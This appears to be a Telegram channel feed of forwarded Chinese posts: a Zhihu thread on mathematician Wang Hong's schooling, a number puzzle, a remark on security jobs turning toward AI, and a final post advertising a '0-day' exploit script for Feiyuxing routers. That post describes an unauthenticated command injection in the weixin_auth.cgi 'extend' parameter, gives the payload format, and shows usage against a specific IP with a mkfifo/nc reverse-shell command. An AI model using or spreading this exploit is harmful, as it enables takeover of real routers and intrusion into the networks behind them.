Forwarded from 一个军盲
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👎2
Forwarded from 知乎大巴扎
Telegraph
王虹 13 岁跳级上高中,16 岁上北大,你支持这种提前教育的节奏吗?什么样的孩子适合走这条道路?
你换个视角看王虹:16岁北大,17岁转专业成功,20岁北大优毕期间担任数学系女子乒乓球队长,23岁巴黎综合理工工程师、 巴黎第十一大学数学硕士期间学习击剑 ,28岁麻省理工博士发四大期间同样热衷于各项运动(韦东奕现在都没发四大),32岁纽约大学科朗研究所副教授,34岁纽约大学科朗研究所正教授IHSE正教授发表那篇举世瞩目的论文,35岁菲尔兹,谈过至少两个以上男朋友(有据可查的就有两个),懂生活会打扮自己……王的传奇故事仍在继续。去掉所有的带主观意愿的形容词将她的履历列举出来,你但凡是个心智正常的人就能感…
知乎大巴扎
王虹 13 岁跳级上高中,16 岁上北大,你支持这种提前教育的节奏吗?什么样的孩子适合走这条道路? | 原文
怎么总有人觉得自己孩子会是天才
Forwarded from quick paster (baka)
为防止水群太多智力减退,请完成以下数学题:
一组小朋友在一起玩耍,他们人数不止2个人,但分成每两人一组之后没有多余的人。请证明可以把他们分成两个神奇的小组,每组的人数都无法分成人数相等的多人小组。
一组小朋友在一起玩耍,他们人数不止2个人,但分成每两人一组之后没有多余的人。请证明可以把他们分成两个神奇的小组,每组的人数都无法分成人数相等的多人小组。
Forwarded from 巽紺
秋招相比暑期实习,最大的感受是传统的岗位快要没了,大家都在往AI上靠。腾讯之前的安全技术,今天更新简历时发现被加上了AI
但是AI怎么做,究竟可以做到哪一步,我相信各个厂都还没完全弄清楚...
但是AI怎么做,究竟可以做到哪一步,我相信各个厂都还没完全弄清楚...
Forwarded from nyarvex
fyx_rce.py
6.2 KB
(0-day)飞鱼星路由器 weixin_auth.cgi 命令注入 - 逐字符写入工具
利用飞鱼星路由器 weixin_auth.cgi 接口中一个未经授权的远程命令注入漏洞(RCE),漏洞位于 /weixin_auth.cgi 的 extend 参数。CGI脚本在处理该参数时,未对用户输入进行过滤,直接将参数值拼接到系统shell命令中执行。构造 extend=volanswechatconnwifi';<注入命令>;',利用分号(;)闭合前面的正常语句,即可插入任意系统命令。
用法:
python3 fyx_rce.py <目标URL> [要写入的命令]
示例:
python3 fyx_rce.py http://222.88.213.2:8081 "mkfifo /tmp/f;cat /tmp/f|sh|nc 1.2.3.4 6666>/tmp/f"
python3 fyx_rce.py http://222.88.213.2:8081 # 使用默认反弹shell命令
利用飞鱼星路由器 weixin_auth.cgi 接口中一个未经授权的远程命令注入漏洞(RCE),漏洞位于 /weixin_auth.cgi 的 extend 参数。CGI脚本在处理该参数时,未对用户输入进行过滤,直接将参数值拼接到系统shell命令中执行。构造 extend=volanswechatconnwifi';<注入命令>;',利用分号(;)闭合前面的正常语句,即可插入任意系统命令。